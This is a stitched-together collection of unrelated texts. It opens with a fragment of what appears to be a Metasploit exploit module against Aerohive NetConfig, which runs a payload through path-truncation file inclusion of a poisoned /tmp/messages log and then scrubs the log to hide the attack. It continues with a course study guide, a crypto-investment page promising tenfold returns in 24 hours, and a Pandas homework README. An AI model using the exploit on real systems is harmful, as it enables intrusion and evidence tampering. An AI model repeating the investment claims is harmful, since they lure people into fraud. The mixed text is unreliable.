mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
newking9088 / MITx 6.431x Probability The Science Of Uncertainty And DataA guide on how to use the wealth of available material This class provides you with a great wealth of material, perhaps more than you can fully digest. This “guide" offers some tips about how to use this material. Start with the overview of a unit, when available. This will help you get an overview of what is to happen next. Similarly, at the end of a unit, watch the unit summary to consolidate your understanding of the “big picture" and of the relation between different concepts. Watch the lecture videos. You may want to download the slides (clean or annotated) at the beginning of each lecture, especially if you cannot receive high-quality streaming video. Some of the lecture clips proceed at a moderate speed. Whenever you feel comfortable, you may want to speed up the video and run it faster, at 1.5x. Do the exercises! The exercises that follow most of the lecture clips are a most critical part of this class. Some of the exercises are simple adaptations of you may have just heard. Other exercises will require more thought. Do your best to solve them right after each clip — do not defer this for later – so that you can consolidate your understanding. After your attempt, whether successful or not, do look at the solutions, which you will be able to see as soon as you submit your own answers. Solved problems and additional materials. In most of the units, we are providing you with many problems that are solved by members of our staff. We provide both video clips and written solutions. Depending on your learning style, you may pick and choose which format to focus on. But in either case, it is important that you get exposed to a large number of problems. The textbook. If you have access to the textbook, you can find more precise statements of what was discussed in lecture, additional facts, as well as several examples. While the textbook is recommended, the materials provided by this course are self-contained. See the “Textbook information" tab in Unit 0 for more details. Problem sets. One can really master the subject only by solving problems – a large number of them. Some of the problems will be straightforward applications of what you have learned. A few of them will be more challenging. Do not despair if you cannot solve a problem – no one is expected to do everything perfectly. However, once the problem set solutions are released (which will happen on the due date of the problem set), make sure to go over the solutions to those problems that you could not solve correctly. Exams. The midterm exams are designed so that in an on-campus version, learners would be given two hours. The final exam is designed so that in an on-campus version, learners would be given three hours. You should not expect to spend much more than this amount of time on them. In this respect, those weeks that have exams (and no problem sets!) will not have higher demands on your time. The level of difficulty of exam questions will be somewhere between the lecture exercises and homework problems. Time management. The corresponding on-campus class is designed so that students with appropriate prerequisites spend about 12 hours each week on lectures, recitations, readings, and homework. You should expect a comparable effort, or more if you need to catch up on background material. In a typical week, there will be 2 hours of lecture clips, but it might take you 4-5 hours when you add the time spent on exercises. Plan to spend another 3-4 hours watching solved problems and additional materials, and on textbook readings. Finally, expect about 4 hours spent on the weekly problem sets. Additional practice problems. For those of you who wish to dive even deeper into the subject, you can find a good collection of problems at the end of each chapter of the print edition of the book, whose solutions are available online.
Vanguard-Comercio-inc / Vanguard Comercio IncVanguard Comercio īnC is a trusted authority in the digital currency investment domain. Our platform allows potential investors to build their investment portfolio consisting of cryptocurrencies. Leverage years of experience of our experts and kickstart your crypto investment endeavours with Vanguard Comercio īnC… We tend to successfully implement our vision every day by integrating environmental, social, and economic considerations into all our business decisions, through partnerships with different countries’ governments, as well as their people, and respectfully interact with all the parties, which are interested. To grow through successful exploration and accretive acquisitions of development-stage precious metals properties. Successfully finance and build mines. Generating "dramatic growth" in Vanguard Comercio Īnc Platform which is associated with bitcoin mining company . Our company has clear, confident development prospects due to the use of modern technologies, mining machines, effective management, and consistent implementation. Our company is one of the fastest growing mining and trading companies in the current industry. our goal is to promote the financial status of our clients through our uncompromised…financial automated forex and binary software. This Trading platform is an Award winning forex Automated trader, providing trading services and financial support for both retail and institutional clients through its policy of providing the best trading signals, software and strategies for investors, we offer both professionals and new beginners opportunity to invest and earn from Forex and Binary options trade. But I most explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and i will give you a complete account of the system and expound we continue to recognize that responsible environmental stewardship and social responsibility are integral components of business in today’s world. Instant Withdrawals Withdrawals are processed in no time upon request.. 24/7 Support Our well trained agents are online to assist you Business Benefits Strategy To grow through successful exploration and accretive acquisitions of development-stage Vanguard Comercio ĪnC properties. Successfully finance and build mines. Generating "dramatic growth " in Bitcoin Mining/Investment and cash flow. To invest is Vanguard Comercio īnC sir/ma’am No need to talk much about our company we pay in due time and there’s no hidden fee or charges We have a mining farm where we generate coin Once you Invest with us an ant-miner will be assigned to your mining profile account which helps to generate coin once you make deposit that’s how we earn profits for you.. What is a Bitmain Antiminers and Where Are They Manufactured? To understand how to get started bitcoin mining, you need to know about Antminers. Bitmain Antminers are mining hardware created by the Chinese company Bitmain. Bitmain was founded by Micree Zhan and Jihan Wu in 2013. Micree Zhan is a chip design expert, who together with Jihan launched Bitmain with the goal of focusing on mining as a way to make money. The Bitmain team soon became one of the world’s leading Bitcoin miners. Look: Bitmain first created the Antminer in 2013, a product which has helped many companies to dominate the new hyper-competitive mining industry. Presently, Bitmain Antminers are responsible for around 70% of all Bitcoin mining. Antminers are simply Bitcoin mining hardware. They are considered to be the most powerful mining hardware in the world. There are Antminers for different cryptocurrencies, such as Bitcoin, Litecoin, ZEC, and Etherium. Antminers do not charge a Bitcoin mining fee for Pay Per Last N Shares (PPLNS). However, they hold on to every transaction fee on the block. How much power do they need? Antminers consume a lot of power, and this consumption is one of the main factors that affect mining ROIs. Antminer S9 for Mining Bitcoin The latest Antminer is the Bitmain Antminer S9 and uses around 1,375W. With this in mind, it is clear that running the S9 will cost you between 15 and 30 cents every hour. This figure may be higher or lower based on the electricity costs in your area. The S9 operates without the need for a separate host computer. To operate the S9, you need a power supply specifically the APW5/APW3, that is sold separately. S9s has an efficacy, power consumption and hashrate of 098 J/GH±7%, 1323W±7%, and 13.5TH/s±7% respectively. At the moment, the Antminer has an output of 14TH/s, making it the most powerful Bitcoin mining hardware on the planet. So what does this mean? Based on its technical specifications, the S9 will have the capacity to mine 0.03600399 Bitcoin per month. This figure does not factor in the cost of hardware, power, pool fees and others. If you run the Antminer for a month, expect to get a profit of 0.02138775 Bitcoin, which is equivalent to $178.78. However, this profit depends on the cost of electricity, which in this instance is assumed to be $0.1 per kWh To begin with, me and my team collected all of the important information about Vanguard Comercio inc in one article, and we hope that you will find what you came for. Vanguard Comercio inc appeared on the trading market in 2014. Since then they have continuously created the new and improved the old, so that your trading on the platform is seamless and lucrative. And that’s just the beginning. Vanguard Comercio inc don’t just give traders a chance to earn, but they also teach them how. Broker’s team has world-class analysts. They develop original trading strategies and teach traders how to use them intelligently in open webinars, and they consult one-on-one with traders. Education is conducted in all the languages that our traders speak. Trading platform Broker’s opportunities for successful trading Presently Vanguard Comercio inc has entered the top of existing brokers by achieving traders needs and latest trends. Broker made a big work trying to make platform reliable, simple and unique. Currently millions of traders around the world are using this platform for trading and their number continues to grow. Our company was registered ® United Kingdom 🇬🇧 we are verified by the Great Britain - [x] ® INVESTMENT PLAN AMATEUR PLANS. $50 earns $500 $100 wins $1,000 $200 wins $2,000 $300 earns $3,000 $400 wins $4,000 REGULAR PLANS $500 wins $5,000 $600 wins $6,000 $700 wins $7,000 $800 wins $8,000 $900 wins $9,000 TEACHER PLANS $1,000 wins $10,000 $2,000 wins $20,000 $3,000 wins $30,000 $4,000 wins $40,000 $5,000 earns $50,000 DURATION: 24 HOURS OF COMMERCIAL you receive your profit with your wallet account
pnguenda / Pandas Challenge# Pandas Homework - Pandas, Pandas, Pandas ## Background The data dive continues! Now, it's time to take what you've learned about Python Pandas and apply it to new situations. For this assignment, you'll need to complete **one of two** (not both) Data Challenges. Once again, which challenge you take on is your choice. Just be sure to give it your all -- as the skills you hone will become powerful tools in your data analytics tool belt. ### Before You Begin 1. Create a new repository for this project called `pandas-challenge`. **Do not add this homework to an existing repository**. 2. Clone the new repository to your computer. 3. Inside your local git repository, create a directory for the Pandas Challenge you choose. Use folder names corresponding to the challenges: **HeroesOfPymoli** or **PyCitySchools**. 4. Add your Jupyter notebook to this folder. This will be the main script to run for analysis. 5. Push the above changes to GitHub or GitLab. ## Option 1: Heroes of Pymoli  Congratulations! After a lot of hard work in the data munging mines, you've landed a job as Lead Analyst for an independent gaming company. You've been assigned the task of analyzing the data for their most recent fantasy game Heroes of Pymoli. Like many others in its genre, the game is free-to-play, but players are encouraged to purchase optional items that enhance their playing experience. As a first task, the company would like you to generate a report that breaks down the game's purchasing data into meaningful insights. Your final report should include each of the following: ### Player Count * Total Number of Players ### Purchasing Analysis (Total) * Number of Unique Items * Average Purchase Price * Total Number of Purchases * Total Revenue ### Gender Demographics * Percentage and Count of Male Players * Percentage and Count of Female Players * Percentage and Count of Other / Non-Disclosed ### Purchasing Analysis (Gender) * The below each broken by gender * Purchase Count * Average Purchase Price * Total Purchase Value * Average Purchase Total per Person by Gender ### Age Demographics * The below each broken into bins of 4 years (i.e. <10, 10-14, 15-19, etc.) * Purchase Count * Average Purchase Price * Total Purchase Value * Average Purchase Total per Person by Age Group ### Top Spenders * Identify the the top 5 spenders in the game by total purchase value, then list (in a table): * SN * Purchase Count * Average Purchase Price * Total Purchase Value ### Most Popular Items * Identify the 5 most popular items by purchase count, then list (in a table): * Item ID * Item Name * Purchase Count * Item Price * Total Purchase Value ### Most Profitable Items * Identify the 5 most profitable items by total purchase value, then list (in a table): * Item ID * Item Name * Purchase Count * Item Price * Total Purchase Value As final considerations: * You must use the Pandas Library and the Jupyter Notebook. * You must submit a link to your Jupyter Notebook with the viewable Data Frames. * You must include a written description of three observable trends based on the data. * See [Example Solution](HeroesOfPymoli/HeroesOfPymoli_starter.ipynb) for a reference on expected format. ## Option 2: PyCitySchools  Well done! Having spent years analyzing financial records for big banks, you've finally scratched your idealistic itch and joined the education sector. In your latest role, you've become the Chief Data Scientist for your city's school district. In this capacity, you'll be helping the school board and mayor make strategic decisions regarding future school budgets and priorities. As a first task, you've been asked to analyze the district-wide standardized test results. You'll be given access to every student's math and reading scores, as well as various information on the schools they attend. Your responsibility is to aggregate the data to and showcase obvious trends in school performance. Your final report should include each of the following: ### District Summary * Create a high level snapshot (in table form) of the district's key metrics, including: * Total Schools * Total Students * Total Budget * Average Math Score * Average Reading Score * % Passing Math (The percentage of students that passed math.) * % Passing Reading (The percentage of students that passed reading.) * % Overall Passing (The percentage of students that passed math **and** reading.) ### School Summary * Create an overview table that summarizes key metrics about each school, including: * School Name * School Type * Total Students * Total School Budget * Per Student Budget * Average Math Score * Average Reading Score * % Passing Math (The percentage of students that passed math.) * % Passing Reading (The percentage of students that passed reading.) * % Overall Passing (The percentage of students that passed math **and** reading.) ### Top Performing Schools (By % Overall Passing) * Create a table that highlights the top 5 performing schools based on % Overall Passing. Include: * School Name * School Type * Total Students * Total School Budget * Per Student Budget * Average Math Score * Average Reading Score * % Passing Math (The percentage of students that passed math.) * % Passing Reading (The percentage of students that passed reading.) * % Overall Passing (The percentage of students that passed math **and** reading.) ### Bottom Performing Schools (By % Overall Passing) * Create a table that highlights the bottom 5 performing schools based on % Overall Passing. Include all of the same metrics as above. ### Math Scores by Grade\*\* * Create a table that lists the average Math Score for students of each grade level (9th, 10th, 11th, 12th) at each school. ### Reading Scores by Grade * Create a table that lists the average Reading Score for students of each grade level (9th, 10th, 11th, 12th) at each school. ### Scores by School Spending * Create a table that breaks down school performances based on average Spending Ranges (Per Student). Use 4 reasonable bins to group school spending. Include in the table each of the following: * Average Math Score * Average Reading Score * % Passing Math (The percentage of students that passed math.) * % Passing Reading (The percentage of students that passed reading.) * % Overall Passing (The percentage of students that passed math **and** reading.) ### Scores by School Size * Repeat the above breakdown, but this time group schools based on a reasonable approximation of school size (Small, Medium, Large). ### Scores by School Type * Repeat the above breakdown, but this time group schools based on school type (Charter vs. District). As final considerations: * Use the pandas library and Jupyter Notebook. * You must submit a link to your Jupyter Notebook with the viewable Data Frames. * You must include a written description of at least two observable trends based on the data. * See [Example Solution](PyCitySchools/PyCitySchools_starter.ipynb) for a reference on the expected format. ## Hints and Considerations * These are challenging activities for a number of reasons. For one, these activities will require you to analyze thousands of records. Hacking through the data to look for obvious trends in Excel is just not a feasible option. The size of the data may seem daunting, but pandas will allow you to efficiently parse through it. * Second, these activities will also challenge you by requiring you to learn on your feet. Don't fool yourself into thinking: "I need to study pandas more closely before diving in." Get the basic gist of the library and then _immediately_ get to work. When facing a daunting task, it's easy to think: "I'm just not ready to tackle it yet." But that's the surest way to never succeed. Learning to program requires one to constantly tinker, experiment, and learn on the fly. You are doing exactly the _right_ thing, if you find yourself constantly practicing Google-Fu and diving into documentation. There is just no way (or reason) to try and memorize it all. Online references are available for you to use when you need them. So use them! * Take each of these tasks one at a time. Begin your work, answering the basic questions: "How do I import the data?" "How do I convert the data into a DataFrame?" "How do I build the first table?" Don't get intimidated by the number of asks. Many of them are repetitive in nature with just a few tweaks. Be persistent and creative! * Expect these exercises to take time! Don't get discouraged if you find yourself spending hours initially with little progress. Force yourself to deal with the discomfort of not knowing and forge ahead. Consider these hours an investment in your future! * As always, feel encouraged to work in groups and get help from your TAs and Instructor. Just remember, true success comes from mastery and _not_ a completed homework assignment. So challenge yourself to truly succeed! ### Copyright Trilogy Education Services © 2019. All Rights Reserved.
